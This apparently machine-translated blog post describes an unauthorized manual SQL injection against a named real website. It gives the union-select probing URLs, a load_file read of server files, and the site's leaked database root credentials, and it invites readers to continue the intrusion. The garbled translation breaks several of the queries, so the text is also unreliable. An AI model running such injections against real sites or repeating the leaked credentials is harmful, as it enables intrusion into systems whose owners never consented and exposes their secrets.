PHP injection test

Reprinted fromNick technical blog

To be honest, I have never intruded into PHP websites. A friend on QQ told me the day before yesterday that I should not just stay on what I would do. I should study and study some things that I would not do, and check the practice. It makes sense, and I also really want to. Unfortunately, no one has taught me about this, and I learned it from beginning to end. However, I also know that this is something someone else can't teach!
Okay, let's stop talking about it. Google found a target http://www.shareedge.com, this is a small Japan, so I directly paste it out, fuck him!
HTTP header information:
HTTP/1.1 200 OK
Date: Sat, 03 Jan 2009 14:35:22 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.6c PHP/4.4.7
X-Powered-By: PHP/4.4.7
Keep-Alive: timeout = 10, max = 100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
X-Pad: avoid browser bug

Find the injection point http://www.shareedge.com/spywareguide/product_show.php? Id = 469
The methods for determining injection points are all the same: 1 = 1 and 1 = 2.
Manual injection is started as follows:
Step 1: http://www.shareedge.com/spywareguide/product_show.php? Id = 469 and 1 = 2 union select 1/* Return Error Page, go on...
Part 2: http://www.shareedge.com/spywareguide/product_show.php? Id = 469 and 1 = 2 union select/* or error page, go on...
Step 3: http://www.shareedge.com/spywareguide/product_show.php? Id = 469 and 1 = 2 union select, 1/* is still the error page until you try
Http://www.shareedge.com/spywareguide/product_show.php? Id = 469 and 1 = 2 union select /*
The returned page is the desired digital page, and the physical path of the previously accessed file is/usr/local/apache2/htdocs/spywareguide/product_show.php. If you ask why the physical path is not in drive C or drive d... I think you should install a linux or unix system.
We convert the physical path to hexadecimal notation
Then, read the file information using the load_file () function of MYSQL. Submit
Http://www.shareedge.com/spywareguide/product_show.php? Id = 469 and 1 = 2 union select, 12, 11, load_file (rows), 9, 8, 5, 4, 3, 2, 1 /*
The following code has aroused my interest.
$ Link_id = mysql_connect ("localhost", $ userid, $ userpassword)
Connect to the database! So this line of code must have specific parameter values and other information for this method. The results are not found, but contain statements are used.
Include dict. php contains this file, so this file must have that information. Read the dict. php file in the same way and obtain the following content:

Php code replication code
<? Php
// Make modifications to make non-default user/password/data base name
$ Userid = "root"; // change to real db user name
$ Userpassword = "nextedge"; // change to real db user password
$ Dbname = "spywareguide"; // change to real db name
?>
 
<? Php
// Make modifications to make non-default user/password/data base name
$ Userid = "root"; // change to real db user name
$ Userpassword = "nextedge"; // change to real db user password
$ Dbname = "spywareguide"; // change to real db name
?>
Find the super administrator information of MYSQL ~ ^_^. Unfortunately, port 3306 has not been opened to the outside world, and the website's backend and phpmyadmin have not been found. Today's learning is now complete. Who can continue to do it? After the process is completed, let me talk about it ~